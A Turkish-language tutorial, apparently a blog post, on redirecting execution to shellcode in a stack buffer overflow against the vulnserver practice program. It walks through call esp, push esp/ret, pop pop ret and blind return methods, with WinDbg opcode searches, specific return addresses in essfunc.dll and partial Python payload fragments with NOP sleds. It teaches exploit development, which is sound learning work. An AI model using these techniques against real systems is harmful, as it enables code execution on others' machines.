Basite indirgenirse bulduğunuz bir zafiyet için bir exploit yazarken yapmaya çalıştığınız şey shellcodenuzu EIP registeri aracılığıyla işlemek.

Bunu yapmanın farklı yöntemleri var, efendim genellikle browser zafiyetlerinde heap spray, normal * overflow açıklarında jmp esp, call esp, push return, pop return etc… kullanarak shellcodu CPU tarafından işliyorsunuz. Bundan önceki makalede bir jmp esp instructionını EIP üzerine yazarak stackde bulunan shellcodea atlamıştık. Bu makalede bunun diğer yöntemlerinden bahsetmeye çalışacağım. Makalede önceki yazıda kullandığımız düzenlenmiş vulnserver programını kullanmaya devam edicem, siz dilerseniz başka bir program kullanabilirsiniz.

call [register] Metodu

Bu metodu herhangi bir register bizim shellcodumuzun başlangıç adresi ile dolu olduğunda kullanabiliyoruz. Önceki makalede exploit ettiğimiz overflow açığının exploiti üzerinde düzenleme yaparak nasıl olduğunu görelim. Öncelikle yapmamız gereken şey diğer yazıda olduğu gibi bir call [reg] instructionı bulmak. Bunun için vulnserver programımızı Olly’de açıyoruz. Ardından ALT + E kısayolu ile çalıştırılabilir moduller içerisinden programın kullandığı essfunc.dll‘ye çift tıklayıp içerisinde girdikten sonra CTRL + F ile call esp araması yapıyoruz.

Gördüğünüz üzere 0x62501203 adresinde call esp instructionu mevcut. Resimde ayrıca bu işlemi hızlıca yapmanın bir yolu olan findjmp isimli uygulamanın çıktısını da görüyorsunuz. Bu adresi alıp önceki makalede bulunan exploitde gerekli yere yazıyoruz. Şu şekilde oluyor son hali:

skip---
mesaj += "A" * 2006
mesaj += struct.pack('<I', 0x62501203) # essfunc.dll call esp (EIP)
mesaj += "\x90" * 20
skip---

Exploiti çalıştırdıktan sonra vulnserver uygulamasının çalıştığı sistemde shellcodumuz çalışacak ve Gari de Gari penceresi açılacaktır.

push return Metodu

Bu metod önceki metodla benzerdir. Örneğin shellcodunuz yine espde olsun fakat bir engelden dolayı call esp yahut jmp esp yapamıyorsunuz. İşte bu durumda yapmanız gereken şey bir adet push esp ve bir adet ret instructionı kullanmak. Bunun için yine hafızada bu iki makine komutunu bulup exploitimizi ona göre düzenleyeceğiz. Ben bu defa windbg kullacağım daha fazla bilgi vermek için. Programı çalıştırıp windbg ile incelemeye aldıktan sonra Debug menüsünden Break‘i seçerek kontrolu devralıyorum. Ardından lm komutuyla yüklenen modülleri listeliyorum.

0:001> lm
start  end    module name
00400000 00407000  image00400000  (deferred)
62500000 62508000  essfunc  (deferred) 
629c0000 629c9000  LPK    (deferred)  
662b0000 66308000  hnetcfg  (deferred)   
71a50000 71a8f000  mswsock  (deferred)

essfunc.dll 62500000 ile 62508000 arasındaymış. Şimdi bu iki adres arasında arama yaparak push esp ret bulacağız. Öncelikle bu iki instructionın makine kodlarını öğrenelim.

0:001> a
7c901210 push esp
push esp
7c901211 ret
ret
7c901212 

0:001> u 7c901210
ntdll!DbgBreakPoint+0x2:
7c901210 54       push  esp
7c901211 c3       ret

54 ve c3 bizim opcode değerlerimiz. Şimdi bu değerleri bizim dll dosyamız içerisinde aratalım.

0:000> s 62500000 62508000 54 c3
625011df 54 c3 ff e2 59 5a c3 5d-c3 55 89 e5 ff e4 ff e6 T...YZ.].U......

625011df adresi bize gereken adres. Şimdi exploiti yeni adrese göre düzenleyip çalıştıralım.

skip---
mesaj += "A" * 2006 
mesaj += struct.pack('<I', 0x625011df) # essfunc.dll push esp, ret (EIP)
mesaj += "\x90" * 20
skip---

Doğrulamak adına kısa bir inceleme yapalım. Windbg üzerinde 625011df adresine bp komutu ile breakpoint koyuyorum. Ardından exploiti çalıştırıp 2-3 step inceliyorum.

Resimde kısa bir analizi görüyorsunuz. push esp ret bulunan adres EIP registerına yazılmış, program ordan devam ederken önce push esp ile 0xbdfa0c yığına gönderiliyor, ardından ret ile yığından bu değer alınıp oradan devam ediliyor. Buradan sonra g ile programı devam ettirirsek exploit çalışacaktır.

pop return Metodu

Eğer yığında shellcodea gidecek başka bir instruction varsa o zaman bu metot kullanılır. Bu gibi durumlarda yığının durumu şuna benzer bir şekilde oluyor:

[AAAAAAAAAAA...AA][0x625011eb][NOOOOOOOOOPLAR[0x625011af][Shellcode]
  JUNK    EIP(pop ret)  8 byte NOP    jmp esp  Shellcode

pop pop ret SEH exploit ederken de karşımıza çıkacak fakat buradaki durum onla alakalı değil. Buradaki mantık şu:

0:001> dd esp
00bdfa0c 90909090 90909090 625011af 90909090
00bdfa1c 90909090 90909090 90909090 90909090
00bdfa2c 6fe79aba d9c2db9a 5ef42474 44b1c931
00bdfa3c 31fcee83 56031056 b6127810 3d04e771

Burada stack durumunu görüyorsunuz. 625011af ESP’ye jmp yapan bir instructionı gösteriyor. Fakat bunun çağırılması için öncelikle ondan öncekilerin ortadan kalkması lazım. Bunları stackten yok etmek için iki adet pop yeterli olacak bizim için, ardından bir ret kullanarak stackteki adresi alıp oradan yürütmeye devam edeceğiz programı.

0:001> a
00bdfa18 pop eax
pop eax
00bdfa19 pop ebx
pop ebx
00bdfa1a ret
ret
00bdfa1b 

0:001> u 00bdfa18
00bdfa18 58       pop   eax
00bdfa19 5b       pop   ebx
00bdfa1a c3       ret

Önce makine kodunu öğrendik, şimdi hafızada aratalım.

0:001> s 62500000 62508000 58 5b c3
625011eb 58 5b c3 e6 59 58 c3 5d-c3 55 89 e5 ff e4 ff e5 X[..YX.].U......

Aradığımız 625011eb adresindeymiş. Şimdi gerekli düzenlemeleri yapalım. Exploitin son hali şu şekilde:

skip---
mesaj += struct.pack('<I', 0x625011eb) # pop pop ret (EIP)
mesaj += "\x90" * 8 # Arada kalan 8 bytelık NOP
mesaj += struct.pack('<I', 0x625011AF) # jmp esp
skip---

Blind Return (Kör Dönüş) Metodu

Bu yöntemi uygulamak için yapmamız gereken öncelikle EIP’i ‘ret’ komutunu gösteren bir adres ile yazmak, ardından shellcodemuzun adresini elle belirleyip stackin ilk 4 byteına yazmak. Bunları gerçekleştirince EIP yazdığımız adrese geldiği zaman, yani ret çalıştığı zaman stackten el ile belirleyip yazdığımız shellcodenun adresini alarak programın akışını oradan devam ettirecek böylece shellcode çalışmış olacak.

Bu metod örneğin EIP’i bir yazmaca gidecek şekilde ayarlayamadığınızda, yani, jmp veya call instructionlarını kullanamadığınızda fakat stackte kontrolunuz olduğu durumlarda kullanabilirsiniz. Çok sık rastlanılmasa da karşı karşıya kalınabilecek durumlardan biri de bu. Tabi bu yöntemi uygularken de nullbyte kullanmamaya dikkat etmeniz gerekiyor. Aksi halde bulduğunuz ret adresi nullbyte içerdiği zaman, bu sonlandırıcı olarak algılanacağı için stacke istediğiniz gibi yazma yapamayacaksınız. Basitçe bu yöntemi kullanırkenki stack görüntünüz şöyle bir şey oluyor.

            ret stackteki ilk 4 byteı
            alıp, oradan devam edecek
            -------------------------    ------------
            |            |    |     |
[AAAAAAAAAAA...AA][bulduğunuz ret adresi]  [0xXXXXXXXX]   [Shellcode]
    JUNK                ESP(Shellcode adresi)

Sevgiler..